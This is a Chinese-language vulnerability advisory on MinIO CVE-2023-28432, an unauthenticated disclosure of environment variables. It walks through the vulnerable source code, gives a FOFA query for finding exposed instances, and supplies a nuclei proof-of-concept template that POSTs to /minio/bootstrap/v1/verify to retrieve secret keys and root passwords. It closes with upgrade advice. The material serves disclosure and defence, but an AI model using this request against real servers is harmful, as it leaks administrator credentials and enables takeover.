???MinIO存在信息泄露漏洞 - 網安 - 專業的網絡安全產業、社區、知識平臺

技術文章僅供參考，此文所提供的信息只為網絡安全人員對自己所負責的網站、服務器等（包括但不限于）進行檢測或維護參考，未經授權請勿利用本文中的技術資料對任何計算機系統進行入侵操作。利用此文所提供的信息而造成的直接或間接后果和損失，均由使用者本人負責。本文所提供的工具僅用于學習，禁止用于其他！

一、漏洞描述

MinIO存在信息泄露漏洞，在集群部署的MinIO中，未經身份認證的遠程攻擊者通過發送特殊HTTP請求即可獲取所有環境變量，其中包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD，造成敏感信息泄露，最終可能導致攻擊者以管理員身份登錄MinIO。

二、影響版本

RELEASE.2019-12-17T23-16-33Z <= MinIO < RELEASE.2023-03-20T20-16-18Z

三、危害描述

利用該漏洞可以獲取所有環境變量，其中包括MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD，造成敏感信息泄露，最終可能導致攻擊者以管理員身份登錄MinIO。

四、漏洞信息

https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L197
// Verify - fetches system server config.func (client *bootstrapRESTClient) Verify(ctx context.Context, srcCfg ServerSystemConfig) (err error) {    if newObjectLayerFn() != nil {        return nil    }    respBody, err := client.callWithContext(ctx, bootstrapRESTMethodVerify, nil, nil, -1)    if err != nil {        return    }    defer xhttp.DrainBody(respBody)    recvCfg := ServerSystemConfig{}    if err = json.NewDecoder(respBody).Decode(&recvCfg); err != nil {        return err    }    return srcCfg.Diff(recvCfg)}
# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L54
const (    bootstrapRESTVersion       = "v1"    bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion    bootstrapRESTPrefix        = minioReservedBucketPath + "/bootstrap"    bootstrapRESTPath          = bootstrapRESTPrefix + bootstrapRESTVersionPrefix)
const (    bootstrapRESTMethodHealth = "/health"    bootstrapRESTMethodVerify = "/verify")
// To abstract a node over network.type bootstrapRESTServer struct{}
// ServerSystemConfig - captures information about server configuration.type ServerSystemConfig struct {    MinioEndpoints EndpointServerPools    MinioEnv       map[string]string}
# https://github.com/minio/minio/blob/master/cmd/bootstrap-peer-server.go#L149
func (b *bootstrapRESTServer) VerifyHandler(w http.ResponseWriter, r *http.Request) {    ctx := newContext(r, w, "VerifyHandler")
    if err := storageServerRequestValidate(r); err != nil {        b.writeErrorResponse(w, err)        return    }
    cfg := getServerSystemCfg()    logger.LogIf(ctx, json.NewEncoder(w).Encode(&cfg))}
// registerBootstrapRESTHandlers - register bootstrap rest router.func registerBootstrapRESTHandlers(router *mux.Router) {    server := &bootstrapRESTServer{}    subrouter := router.PathPrefix(bootstrapRESTPrefix).Subrouter()
    subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodHealth).HandlerFunc(        httpTraceHdrs(server.HealthHandler))
    subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify).HandlerFunc(        httpTraceHdrs(server.VerifyHandler))}
# https://github.com/minio/minio/blob/master/cmd/object-api-utils.go#L210
// SlashSeparator - slash separator.const SlashSeparator = "/"
https://github.com/minio/minio/blob/master/cmd/generic-handlers.go#L138
const (    minioReservedBucket              = "minio"    minioReservedBucketPath          = SlashSeparator + minioReservedBucket    minioReservedBucketPathWithSlash = SlashSeparator + minioReservedBucket + SlashSeparator
SlashSeparator = "/"minioReservedBucketPath = SlashSeparator + minioReservedBucket ==> /minio
bootstrapRESTPrefix        = minioReservedBucketPath + "/bootstrap" ==> /minio/bootstrap/
bootstrapRESTVersion       = "v1"bootstrapRESTVersionPrefix = SlashSeparator + bootstrapRESTVersion ==> /v1bootstrapRESTMethodVerify = "/verify"
subrouter.Methods(http.MethodPost).Path(bootstrapRESTVersionPrefix + bootstrapRESTMethodVerify) ==> /v1/verify/
final path:/minio/bootstrap/v1/verify/

FOFA語句

```

banner="MinIO" || header="MinIO" || title="MinIO Browser"

```

### EXP/POC

```

id: CVE-2023-28432

info:

name: Minio post policy request security bypass

author: Mr-xn

severity: high

description: Minio is a Multi-Cloud Object Storage framework. In a cluster deployment starting with RELEASE.2019-12-17T23-16-33Z and prior to RELEASE.2023-03-20T20-16-18Z, MinIO returns all environment variables, including MINIO_SECRET_KEY and MINIO_ROOT_PASSWORD, resulting in information disclosure. All users of distributed deployment are impacted. All users are advised to upgrade to RELEASE.2023-03-20T20-16-18Z.

reference:

- https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q

- https://github.com/minio/minio/pull/16853/files

- https://github.com/golang/vulndb/issues/1667

- https://github.com/CVEProject/cvelist/blob/master/2023/28xxx/CVE-2023-28432.json

classification:

cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

cvss-score: 7.5

cve-id: CVE-2023-28432

cwe-id: CWE-200

tags: cve,cve2023,

requests:

- raw:

- |+

POST /minio/bootstrap/v1/verify HTTP/1.1

Host: {{Hostname}}

Content-Type: application/x-www-form-urlencoded

matchers-condition: and

matchers:

- type: word

part: body

words:

- '"MinioEndpoints"'

- type: word

part: header

words:

- 'Content-Type: text/plain'

- type: status

status:

- 200

```

### nuclei驗證

```

nuclei -v -t /path/to/CVE-2023-28432.yaml -u http://target.com:port

```

![CVE-2023-28432-POC](E:\Program Files\江西移動工作報告\2023年03月工作文件\23.3.24\CVE-2023-28432-POC.jpg)

![CVE-2023-28432-result](E:\Program Files\江西移動工作報告\2023年03月工作文件\23.3.24\CVE-2023-28432-result.jpg)

### 處置建議

目前官方已發布安全修復版本，受影響用戶可以升級到RELEASE.2023-03-20T20-16-18Z及以上版本。

``` bash

https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z

```

### 參考資料

``` bash

[1]https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z

[2]https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q

[3]https://github.com/Mr-xn/CVE-2023-28432